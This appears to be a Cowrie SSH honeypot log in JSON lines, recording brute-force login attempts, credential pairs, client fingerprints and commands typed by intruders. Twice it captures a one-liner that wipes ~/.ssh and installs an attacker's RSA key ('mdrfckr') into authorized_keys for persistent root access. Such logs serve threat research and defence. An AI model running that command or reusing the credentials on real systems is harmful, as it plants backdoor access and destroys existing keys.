{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49548,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b21e6217aa1","protocol":"ssh","message":"New connection: 212.227.235.229:49548 (1.2.3.4:22) [session: 2b21e6217aa1]","sensor":"my-vps","timestamp":"2025-09-08T13:47:47.703538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:47.704168Z","src_ip":"212.227.235.229","session":"2b21e6217aa1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:47.821100Z","src_ip":"212.227.235.229","session":"2b21e6217aa1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:47:48.327467Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:47:48.328161Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:47:48.329128Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.login.failed","username":"webserver","password":"webserver","message":"login attempt [webserver/webserver] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:48.331367Z","src_ip":"212.227.235.229","session":"2b21e6217aa1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:48.643576Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:47:49.252355Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.253021Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.449653Z","src_ip":"212.227.235.229","session":"2b21e6217aa1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.561498Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.562336Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":12972,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9c1af3b9eb2","protocol":"ssh","message":"New connection: 49.247.35.31:12972 (1.2.3.4:22) [session: c9c1af3b9eb2]","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.814381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:49.818523Z","src_ip":"49.247.35.31","session":"c9c1af3b9eb2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:50.075288Z","src_ip":"49.247.35.31","session":"c9c1af3b9eb2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:51.080743Z","src_ip":"49.247.35.31","session":"c9c1af3b9eb2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.341612Z","src_ip":"49.247.35.31","session":"c9c1af3b9eb2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":33556,"dst_ip":"1.2.3.4","dst_port":22,"session":"550d889bc740","protocol":"ssh","message":"New connection: 134.199.174.250:33556 (1.2.3.4:22) [session: 550d889bc740]","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.402252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.403107Z","src_ip":"134.199.174.250","session":"550d889bc740"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":38422,"dst_ip":"1.2.3.4","dst_port":22,"session":"78fb0421db5e","protocol":"ssh","message":"New connection: 49.247.35.31:38422 (1.2.3.4:22) [session: 78fb0421db5e]","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.674143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.675023Z","src_ip":"49.247.35.31","session":"78fb0421db5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.713717Z","src_ip":"134.199.174.250","session":"550d889bc740"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:52.998760Z","src_ip":"49.247.35.31","session":"78fb0421db5e"}
{"eventid":"cowrie.login.failed","username":"backup","password":"pass123","message":"login attempt [backup/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:53.617795Z","src_ip":"134.199.174.250","session":"550d889bc740"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:47:54.255712Z","src_ip":"49.247.35.31","session":"78fb0421db5e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:54.557181Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:54.558006Z","src_ip":"49.247.35.31","session":"78fb0421db5e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:54.908442Z","src_ip":"134.199.174.250","session":"550d889bc740"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60708,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf2c4c4dffc","protocol":"ssh","message":"New connection: 217.72.205.35:60708 (1.2.3.4:22) [session: cdf2c4c4dffc]","sensor":"my-vps","timestamp":"2025-09-08T13:48:13.504380Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:13.505509Z","src_ip":"217.72.205.35","session":"cdf2c4c4dffc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36666,"dst_ip":"1.2.3.4","dst_port":22,"session":"152d068b7fe0","protocol":"ssh","message":"New connection: 134.199.174.250:36666 (1.2.3.4:22) [session: 152d068b7fe0]","sensor":"my-vps","timestamp":"2025-09-08T13:48:23.589068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:48:23.591757Z","src_ip":"134.199.174.250","session":"152d068b7fe0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:48:23.916392Z","src_ip":"134.199.174.250","session":"152d068b7fe0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123abc","message":"login attempt [backup/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:48:25.341200Z","src_ip":"134.199.174.250","session":"152d068b7fe0"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:26.670746Z","src_ip":"134.199.174.250","session":"152d068b7fe0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38276,"dst_ip":"1.2.3.4","dst_port":22,"session":"acde3b40f6ff","protocol":"ssh","message":"New connection: 212.227.235.229:38276 (1.2.3.4:22) [session: acde3b40f6ff]","sensor":"my-vps","timestamp":"2025-09-08T13:48:35.384699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:48:35.385914Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:48:35.487461Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@112211","message":"login attempt [root/Aa@112211] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.004160Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:48:36.410603Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.411380Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.412292Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.549613Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:48:36.801206Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.801849Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.942271Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:36.943110Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38278,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2e6ddcc0779","protocol":"ssh","message":"New connection: 212.227.235.229:38278 (1.2.3.4:22) [session: a2e6ddcc0779]","sensor":"my-vps","timestamp":"2025-09-08T13:48:37.048226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:48:37.054354Z","src_ip":"212.227.235.229","session":"a2e6ddcc0779"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:48:37.160899Z","src_ip":"212.227.235.229","session":"a2e6ddcc0779"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:48:37.586450Z","src_ip":"212.227.235.229","session":"a2e6ddcc0779"}
